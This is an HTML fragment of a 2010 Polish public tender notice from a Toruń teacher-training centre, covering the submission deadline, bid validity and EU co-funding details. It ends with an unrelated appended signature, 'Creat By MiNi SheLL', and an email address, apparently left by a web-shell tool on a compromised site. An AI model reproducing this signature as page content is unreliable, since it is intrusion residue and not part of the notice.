<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpcen-torun.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Aleja Solidarności 3, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 10:00, miejsce: Aleja Solidarności 3, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT WSPÓŁFINANSOWANY Z FUNDUSZY UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI
Priorytet  IX, Rozwój wykształcenia i kompetencji w regionach
Działanie 9.4,Wysoko wykwalifikowane kadry systemu oświaty
Tytuł projektu: Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com